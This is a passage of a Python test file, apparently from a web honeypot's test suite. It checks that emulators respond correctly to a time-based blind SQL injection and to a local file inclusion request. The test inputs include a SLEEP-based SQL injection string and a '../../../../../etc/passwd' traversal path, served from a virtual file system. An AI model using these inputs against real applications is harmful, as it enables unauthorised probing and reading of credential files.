    served_body = self.event.response.split('\r\n\r\n')[1]
    served_digest = hashlib.md5(served_body).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value", served_digest,
    print "matched expectation."
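def test_blind_sqli(self):
    """Objective: Injecting a response delaying SQL query.
    Input: ') AND SLEEP(1) AND (4673=4673'
    Expected Results: Response is delayed by 1 second
    Notes: Timing uses datetime.now() (wall clock), so a clock adjustment during
           the call could skew the measured duration."""
    print "Starting time based injection test"
    self.event.matched_pattern = "sqli"
    request_handler = RequestHandler(self.data_dir)
    emulator = request_handler.get_handler(self.event.matched_pattern)
    self.event.http_request.request_query = {
        "q": [
            ") AND SLEEP(1) AND (4673=4673",
        ],
    }
    self._get_test_request(self.event)
    print "Noting time and sending request:", self.test_request
    start = datetime.datetime.now()
    emulator.handle(self.event)
    end = datetime.datetime.now()
    duration = end - start
    # timedelta.seconds is only the seconds *component*; total_seconds() is the
    # full span, which is what the delay assertion is about.
    self.assertGreaterEqual(duration.total_seconds(), 1)
    print "Response duration: ", duration,
    print "equates our expectation."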
def test_lfi_emulator(self):
    """Objective: Local File Inclusion module testing.
    Input: http://localhost:8080/test.php?p=../../../../../etc/passwd
    Expected Result: The passwd file from the virtual file system.
    Notes: Compares the served body against virtualdocs/linux/etc/passwd by digest."""
    print "Starting local file inclusion test"
    passwd_path = os.path.join(self.data_dir, "virtualdocs/linux/etc/passwd")
    with open(passwd_path, 'r') as fh:
        passwd_source = fh.read()
    # md5 is used only as a content-equality fingerprint here, not as a
    # security control.
    expected_digest = hashlib.md5(passwd_source).hexdigest()
    print "Hash of the local 'passwd' file:", expected_digest
    parsed = util.HTTPRequest()
    parsed.url = "/test.php?p=../../../../../etc/passwd"
    self.event.parsed_request = parsed
    print "Sending request:", "http://localhost:8080" + parsed.url
    self.event.matched_pattern = "lfi"
    self.event.response = ""
    print "Loading the emulator and handling the request."
    handler = RequestHandler(self.data_dir)
    module = handler.get_handler(self.event.matched_pattern)
    module.handle(self.event)
    served_digest = hashlib.md5(self.event.response).hexdigest()
    self.assertEqual(served_digest, expected_digest)
    print "Return value:", served_digest
    print "matched the hash of the local file."